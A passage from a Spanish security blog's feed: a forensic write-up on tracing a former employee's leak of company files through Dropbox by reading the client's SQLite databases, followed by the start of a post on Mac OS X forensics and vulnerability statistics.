/&gt;".&amp;nbsp; Quisiera en esta ocasión hablar de un caso de fuga de información de un empleado que utilizo el servicio de DropBox para subir ficheros propiedad de la empresa y por tanto constituyente de un posible delito de propiedad intelectual y revelación de datos confidenciales.&lt;br /&gt;&lt;br /&gt;El caso es el siguiente:&lt;br /&gt;&lt;br /&gt;Carlos  es una persona dinamica, atrevida, un buen comercial, una persona hecha  a sí misma, luchadora, positiva, de voluntad férrea y  con un carisma y  empatía hacia los clientes casi ilimitados. (¿Conoces a alguien así?,  seguro que si). Por  supuesto que estas cualidades no aseguran el éxito,  pero sí ayudan a  conseguir un buen puesto en la &lt;i&gt;pole position&lt;/i&gt; y eso fué lo que le paso a Carlos&lt;i&gt; &lt;/i&gt;encontro el trabajo de su vida en una empresa con la que competia, pero cometio un pequeño fallo se llevo de la anterior lo que no era suyo&lt;i&gt;.&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;Este caso ocurre cada vez más a diario en las empresas. Por  un lado la falta de legislación interna (procedimientos, normas, gestión  de la seguridad) y por otro la falta de controles tecnológicos como  seguridad en los puestos y dispositivos: como pendrives, cámaras de fotos  y discos externos&lt;i&gt; &lt;/i&gt;permiten que los usuarios con cierto acceso a  información de la empresa y tras un tiempo consideren que esa  información también les pertenece (Craso error!!).&lt;br /&gt;&lt;br /&gt;Ya hemos hablado de ello en otras cocasiones y quizas lo más importante de todo es la falta de formación y/o concenciación sobre todo en la parte directiva que todavía o no entiende o no llega a ver la magnitud del problema.&lt;br /&gt;&lt;br /&gt;Volviendo al caso, Carlos  se despidio en Enero y "casualmente" en Febrero trabaja para la  competencia. La Dirección de la empresa ante la sospecha decide realizar  un análisis sobre el equipo (portátil) para determinar si ha existido  una fuga de información.&lt;br /&gt;&lt;br /&gt;Veamos que tiene Carlos.&lt;br /&gt;&lt;br /&gt;Hacemos  lo habitual, representante de la empresa, representante sindical,  apertura de acta, adquisición de disco, huellas, etc, etc..y una vez  obtenido se procede a la explotación de los datos.&lt;br /&gt;&lt;br /&gt;Tras  un análisis superficial nos encontramos en la carpeta de  "C:\Users\0200CAR\" una carpeta de nombre "Dropbox". con los siguientes  ficheros:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-itHO_uCpjmQ/Tc1zC9ZQAPI/AAAAAAAACbo/LZrbBbfu1wE/s1600/Captura.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="158" src="http://1.bp.blogspot.com/-itHO_uCpjmQ/Tc1zC9ZQAPI/AAAAAAAACbo/LZrbBbfu1wE/s400/Captura.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Vamos a análizar que es y como descubrimos una fuga de datos en la máquina de Carlos utilizando&amp;nbsp; el servicio de DropBox.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Dropbox&lt;/b&gt;  es un servicio de alojamiento de ficheros en la nube. El servicio  permite a los usuarios  almacenar y sincronizar archivos en línea y  entre ordenadores y  compartir archivos y carpetas con otros. El  producto dispone de versiones gratuitas y de pago.&lt;br /&gt;&lt;br /&gt;Actualmente  tiene soporte para historial de revisiones, de forma que los archivos  borrados de la carpeta de Dropbox pueden ser recuperados desde  cualquiera de los ordenadores donde se disponga la misma cuenta. También  existe la funcionalidad de conocer la historia de un archivo en el que  se esté trabajando, permitiendo que una persona pueda editar y cargar  los archivos sin peligro de que se puedan perder las versiones previas.&lt;br /&gt;Si  un archivo en una carpeta Dropbox de un usuario es cambiado, Dropbox  solo carga las partes del archivo que son cambiadas cuando se  sincroniza. Este acción es una de las que sale reflejada en esta actuación.&lt;br /&gt;&lt;br /&gt;Los ficheros de la configuración del equipo  de Carlos están en formato SQL LITE y por lo tanto y como en ocasiones  anteriores es sencillo de poder analizar la estructura de la base de  datos y tablas. Para ello me voy a basar en la información de mi buen amigo&amp;nbsp;&lt;span class="Apple-style-span" style="color: #4e4e4e; font-family: 'Segoe UI', Calibri, 'Myriad Pro', Myriad, 'Trebuchet MS', Helvetica, Arial, sans-serif; font-size: 13px; line-height: 19px;"&gt;&lt;a href="http://dereknewton.com/about/"&gt;Derek Newton&lt;/a&gt;&lt;/span&gt;&amp;nbsp;al cual conocí personalmente en una de estas quedadas de 'Analistas forenses' en Estados Unidos.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-itHO_uCpjmQ/Tc1zC9ZQAPI/AAAAAAAACbo/LZrbBbfu1wE/s1600/Captura.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;Veamos que contiene:&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;&lt;b&gt;config.db:&amp;nbsp;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;Contiene la configuración del cliente e incluye muchos campos de los que destaco los siguientes:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;host_id:&lt;/b&gt;&amp;nbsp;  Es el hash de autenticación utilizado por el cliente para autenticar en  Dropbox. Este hash se asigna al realizar la instalación inicial y la  autenticación y no cambia si este no es revocado desde la interfaz web  de Dropbox.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;correo electrónico:&lt;/b&gt; Dirección de correo electrónico titular de la cuenta.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;dropbox_path&lt;/b&gt;: Ruta de acceso&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;recently_changed3&lt;/b&gt;:  muestra la ruta / nombre de archivo para los últimos cinco ficheros  cambiados recientemente . Este es probablemente el único campo realmente  útil en el análisis forense.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;b&gt;root_ns:&lt;/b&gt; Hace referencia a la ruta de acceso base Dropbox.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;&lt;b&gt;filecache.db&lt;/b&gt;:&lt;/div&gt;&lt;br /&gt;Contiene una serie de tablas, pero el objetivo principal es describir  todos los archivos de forma activa en el cuadro de selección.&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;file_journal&lt;/b&gt;:  Incluye el tamaño de archivo, ruta de acceso (en bytes), mtime (fecha  de modificación del archivo, en&amp;nbsp; formato POSIX), ctime (hora de  creación), local_dir (bandera que indica si la entrada es un directorio  ), block_ref: ID de archivo de mapas (fj_id) para presentar los hashes  (hash_id) que se encuentran en la tabla block_cache.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;block_cache:&lt;/b&gt; Identificador del hash (id).&lt;/li&gt;&lt;li&gt;&lt;b&gt;mount_table&lt;/b&gt;: Aparece en las carpetas de lista que se comparten con otros usuarios de Dropbox.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;b style="color: red;"&gt;host.db:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;El fichero se encuentra totalmente&amp;nbsp;vacío.&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;&lt;b&gt;sigstore.db&lt;/b&gt;:&lt;/div&gt;&lt;br /&gt;Almacena los valores hash con los que corresponden a los valores que se encuentran en la tabla block_cache en filecache.db.&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;&lt;b&gt;unlink.db:&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;Parece ser un archivo binario.&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;En cuanto a nuestro Análisis forense nos encontramos con las siguientes evidencias centrandome en el fichero '&lt;b&gt;config.db&lt;/b&gt;'  y que particularmente he exportado a Excel para su mayor manejo y  comprensión del contenido de los campos (y destaco los que me parecen  significativos en color rojo)&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-EAFD6eIVqEs/Tc4z1DQ40sI/AAAAAAAACb0/M9opvttV0zI/s1600/Captura.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="232" src="http://2.bp.blogspot.com/-EAFD6eIVqEs/Tc4z1DQ40sI/AAAAAAAACb0/M9opvttV0zI/s400/Captura.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;table border="0" cellpadding="0" cellspacing="0" style="width: 1999px;"&gt;&lt;tbody&gt;&lt;tr height="17"&gt;&lt;td class="xl65" height="17" style="height: 12.75pt; width: 157pt;" width="209"&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="width: 1343pt;" width="1790"&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="width: 1343pt;" width="1790"&gt;&lt;br /&gt;&lt;/td&gt; &lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;b&gt;host_id:&lt;/b&gt;&lt;i&gt; &lt;/i&gt;1afd404a46c53dac85bc296bc60e9bdc&lt;br /&gt;&lt;br /&gt;Es el identificador de Carlos en la nube de DropBox &lt;br /&gt;&lt;br /&gt;&lt;b&gt;email:&lt;/b&gt;  carlos.pXX(borrado intencionadamente y poco más que decir que es una  cuenta de correo en la que claramente identifica que ha utilizado una  cuenta personal)&lt;br /&gt;&lt;br /&gt;&lt;b&gt;recently_changed3&lt;/b&gt;:&amp;nbsp; &lt;br /&gt;&lt;table border="0" cellpadding="0" cellspacing="0" style="width: 1790px;"&gt;&lt;tbody&gt;&lt;tr height="17"&gt;&lt;td height="17" style="height: 12.75pt; width: 1343pt;" width="1790"&gt;&lt;span style="font-size: x-small;"&gt;tlp1 (V34923386:/&lt;b&gt;DATOS_CLIENTES/clientes.xls&lt;/b&gt; I00 tp2 a(V34923386:/&lt;b&gt;DATOS_CLIENTES/FORMULARIO_SERVICIOS.doc&lt;/b&gt; I00&lt;br /&gt;tp3 a(V34923386:/DATOS_CLIENTES/shareddir.dat Ntp4 a(V34923386:/DATOS_CLIENTES/known2.met&lt;br /&gt;Ntp5 a(V34923386:/DATOS_CLIENTES/known.met Ntp6 a.&lt;/span&gt;&lt;/td&gt; &lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;Este campo es interesante dado que muestra la ruta y nombre de  archivo para los cinco ultimos ficheros que han cambiado recientemente.  La mayoría de los archivos que aquí aparecen incluyen los archivos  eliminados o borrados de la lista desplegable.&amp;nbsp; El contenido para este  registro se basa en texto y es coherente con el siguiente formato:&lt;br /&gt;&lt;br /&gt;El texto comienza con "tp1", termina con "a"., el siguiente tp2 y así sucesivamente&lt;br /&gt;Las entradas están en orden de más reciente a menos reciente y cada entrada es el nombre del archivo / ruta seguida por "I00".&lt;br /&gt;&lt;br /&gt;Si el archivo se ha eliminado o borrado de la Dropbox, el "I00" el  texto se elimina y una "N" se coloca en delante del texto "TP #"&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;Por lo tanto en esta entrada tenemos como minimo una lista de  ficheros (tras consultarlo con la empresa, nos asegurán que los nombres  coinciden con los que ellos disponen actualmente), los ficheros (entre otros) se llaman, clientes.xls y formulario_servicios.docx&lt;br /&gt;&lt;br /&gt;También el fichero 'filecache.db' contiene información interesante:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-LZ5Xb-XVVjU/Tc-ujMSO_fI/AAAAAAAACb4/pB2Oz-uNtes/s1600/Captura.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-LZ5Xb-XVVjU/Tc-ujMSO_fI/AAAAAAAACb4/pB2Oz-uNtes/s1600/Captura.PNG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;Y ahora vamos a ver que ficheros son los que tiene sincronizados el DropBox o como mínimo los que la empresa ha identificado, para ello vamos a ver la tabla 'file_journal'&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-YUzmI2oGJsI/TdAw-lVckLI/AAAAAAAACb8/mR3Uys5BhL8/s1600/Captura.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="305" src="http://4.bp.blogspot.com/-YUzmI2oGJsI/TdAw-lVckLI/AAAAAAAACb8/mR3Uys5BhL8/s320/Captura.PNG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;En ella vemos los id's: 158, 159 y 160 que contienen la ruta y el nombre de los ficheros&lt;i&gt;. &lt;/i&gt;Evidentemente coinciden con los ficheros anteriores.&lt;br /&gt;&lt;br /&gt;Para corroborar lo visto falta que nos traigan el móvil de Carlos, al cual en su momento pertinente procederé a realizar un análisis para disponer en el mejor de los casos de dos evidencias, siempre y cuando tenga montado en su dispositivo DropBox.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Conclusiones:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Una vez realizado el análisis del disco duro del portátil, se extrae que Carlos en un periodo entre un mes antes de su marcha a la competencia y dadas la evidencias siguientes se ve que estuvo trabajando con datos confidenciales a los que tenía acceso. Las evidencias (entre otras) mostradas en el informe&amp;nbsp;fueron&amp;nbsp;las siguientes:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;En el disco duro no existen los ficheros propiedad de la empresa.&lt;/li&gt;&lt;li&gt;No existe actividad de inserción de dispositivos externos.&lt;/li&gt;&lt;li&gt;Aparecen referencias de accesos directos en documentos recientes.&lt;/li&gt;&lt;li&gt;En el fichero de paginación aparecen contenidos de estos ficheros (es decir se&amp;nbsp;abrieron).&lt;/li&gt;&lt;li&gt;Se evidencia accesos del&amp;nbsp;histórico&amp;nbsp;de URL' de Firefox s a DropBox.&lt;/li&gt;&lt;li&gt;Se encuentra DropBox instalado y funcionando, se verifica la existencia de estos ficheros dentro de la bd.&lt;/li&gt;&lt;li&gt;Se recuperan ficheros borrados que coinciden con los que son propiedad de la empresa y se comprueba que la fecha de ultimo acceso es de cinco días antes de su marcha.&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;Ahora el caso está pendiente de la Justicia.&lt;br /&gt;&lt;br /&gt;Quisiera comentar que según Derek y tal y como he&amp;nbsp;leído&amp;nbsp;en los foros de DropBox, parece ser que la&amp;nbsp;autenticidad&amp;nbsp;del usuario de una cuenta de este servicio es vulnerable con tan solo copiar el fichero 'config.db' a otro directorio base de DropBox que pertenezca a otro usuario, pudiendo suplantar y acceder a los datos de este. (Esto no lo he corroborado y se pasa del mero trabajo realizado sobre este portátil). Aunque si alguien ha accedido a tu máquina y es capaz de copiar el fichero de marras, quizás lo que menos te preocupes es que se lleven este fichero, dado que se &amp;nbsp;han podido llevar TODO.&lt;br /&gt;&lt;br /&gt;Hablando de este y otros temas con mi buen amigo&amp;nbsp;&lt;a href="http://www.elladodelmal.com/2010/09/entrevista-yago-de-security-by-default.html"&gt;Yago Jesús&lt;/a&gt; de &lt;a href="http://www.securitybydefault.com/"&gt;Security By Default&lt;/a&gt;, coincidimos en que sería tan simple como cifrar el contenedor de DropBox, cosa que Yago os explicará en breves en Security By Default. No os lo&amp;nbsp;perdáis.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Referencias:&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;http://dereknewton.com/2011/04/dropbox-authentication-static-host-ids/&lt;/i&gt;&lt;br /&gt;&lt;i&gt;http://www.reversecurity.com/2011/04/video-demonstration-of-dropbox.html&lt;/i&gt;&lt;br /&gt;&lt;i&gt;http://forums.dropbox.com/topic.php?id=37231&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-1704980250987174089?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/1704980250987174089/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=1704980250987174089' title='5 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/1704980250987174089'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/1704980250987174089'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2011/05/donde-estara-mi-carroforensics-dropbox.html' title='Dónde estará mi carro...(Forensics DropBox)'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-mUfur5mWNBQ/TdIK199It_I/AAAAAAAACcA/w6HMT07pW38/s72-c/Dropbox.jpg' height='72' width='72'/><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-6791022664786659326</id><published>2011-01-24T17:58:00.000+01:00</published><updated>2011-01-24T17:58:28.003+01:00</updated><title type='text'>Forensics Mac OSX. Mitos y realidades (I)</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/TT1Y0ulzEpI/AAAAAAAACZM/2zat_2BChVA/s1600/isitsafe.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/TT1Y0ulzEpI/AAAAAAAACZM/2zat_2BChVA/s200/isitsafe.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;Hace días que no escribo y no es por otra cosa más que por falta de tiempo. Entre conferencia y conferencia y trabajo y trabajo apenas me queda tiempo de dedicarle tiempo al blog. Bueno espero que la situación empiece a cambiar y tenga algo más de tiempo para escribir.&lt;br /&gt;&lt;br /&gt;Hoy vamos a hablar sobre Mac OSX en entornos forenses. Todo es debido a que hemos tenido un caso de lo más curioso que rompe los mitos de que 'mi mac es mas seguro que windows' o 'en mac no hace falta antivirus'. Nada más lejos de la realidad. También quiero explicar que con estos post no quiero polemizar ni crear un debate, tan solo pretende ser objetivo con un sistema operativo al cual me he tenido que enfrentar en ocasiones en diversos análisis forenses y compartirlo con ustedes los lectores.&lt;br /&gt;&lt;br /&gt;El objeto de escribir este post viene dado a que hemos colaborado con una entidad financiera que ha recibido un ataque de denegación de servicio DDOS desde un olvidado Mac&lt;br /&gt;&lt;br /&gt;En este post vamos a ver paso a paso que es y que se precisa para realizar un forense. &lt;br /&gt;&lt;br /&gt;Los post que voy a escribir tratarán en mayor y menor medida el siguiente índice:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Forensics Mac OSX. Mitos y realidades (I)&lt;/li&gt;&lt;li&gt;Forensics Mac OSX. Carácteristicas de Mac OSX y requisitos para un forense (II)&lt;/li&gt;&lt;li&gt;Forensics Mac OSX. Analizando el sistema, herraimentas y utilidades (III)&lt;/li&gt;&lt;li&gt;Forensics Mac OSX. Un caso real, paso a paso (IV) (Como comentaba anteriormente una entidad financiera ha tenido un problema en sus servicios centrales dejando inoperativo el acceso a cajeros y servidores de la entidad y todo gracias a un mac.)&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;EMPEZAMOS &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;¿Pero que es OSX? &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;OS X es un sistema operativo desarrollado y comercializado por Apple Inc. Está basado en UNIX, y se construyó sobre las tecnologías desarrolladas en NeX.  El servidor Mac OSX incluye herramientas para administrar grupos de trabajo e incluyen un servidor de correo, un servidor Samba, un servidor LDAP y un servidor de dominio. &lt;br /&gt;&lt;br /&gt;El Mac OS X posee una arquitectura modular que se construye a partir de cuatro componentes básicos: el sistema operativo central , un conjunto de estructuras de aplicaciones, sistemas de gráficos basados en estándares y la interfaz de usuario.&lt;br /&gt;&lt;br /&gt;Mac OS X incorpora Cocoa que es un conjunto de estructuras orientadas a objetos que permite añadir interfaces de usuario gráficas al software UNIX existente y crear aplicaciones completamente nuevas desde cero. Java permite el desarrollo y la ejecución de programas multiplataforma Java 2 Edición Estándar en Mac OS X, incluidos los que están programados con Java Developer Kit (JDK) 1.4.1. &lt;br /&gt;&lt;br /&gt;&lt;b&gt;¿Es seguro mi MAC?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;En materias de seguridad y según dice WIKIPEDIA:&lt;br /&gt;&lt;br /&gt;"La arquitectura de seguridad integrada en el Mac OS X, al igual que en otros sistemas Unix, es una de las principales razones por las que los Mac están libres de malware." &lt;b&gt;&lt;span style="color: red;"&gt;¡¡FAIL!!.&lt;/span&gt;&lt;/b&gt; El autor de esta entrada o no está muy bien enterado o es un 'Mac abdupted'&lt;br /&gt;&lt;br /&gt;Si nos vamos a la fuente de vulnerabilidades en &lt;a href="http://secunia.com/" style="color: blue;"&gt;SECUNIA &lt;/a&gt;podemos ver lo siguiente:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://secunia.com/advisories/graph/?type=adv&amp;amp;period=2010&amp;amp;prod=96" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="195" src="http://secunia.com/advisories/graph/?type=adv&amp;amp;period=2010&amp;amp;prod=96" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;Es decir el pasado año 2010 se han contabilizado vulnerabilidades en Mac OSX y si lo comprobamos con la siguiente gráfica:&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://secunia.com/advisories/graph/?type=sol&amp;amp;period=2010&amp;amp;prod=96" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="166" src="http://secunia.com/advisories/graph/?type=sol&amp;amp;period=2010&amp;amp;prod=96" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;Es para tenerle miedo, mas si nos fijamos en que el 17% de vulnerabilidades quedarón sin parchear el pasado año, si además nos fijamos en la siguiente:&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://secunia.com/advisories/graph/?type=cri&amp;amp;period=2010&amp;amp;prod=96" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="166" src="http://secunia.com/advisories/graph/?type=cri&amp;amp;period=2010&amp;amp;prod=96" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;El 67% de vulnerabilidades son de nivel alto y en la siguiente:&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://secunia.com/advisories/graph/?type=fro&amp;amp;period=2010&amp;amp;prod=96" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="166" src="http://secunia.com/advisories/graph/?type=fro&amp;amp;period=2010&amp;amp;prod=96" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;&lt;p$1&gt;Ya es para morirse el 83% son remotas y más viendo lo que se puede conseguir con esta última pantalla:&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;/p$1&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://secunia.com/advisories/graph/?type=imp&amp;amp;period=2010&amp;amp;prod=96" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="216" src="http://secunia.com/advisories/graph/?type=imp&amp;amp;period=2010&amp;amp;prod=96" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;El 18% acceso al sistema y otro 18% de denegación de 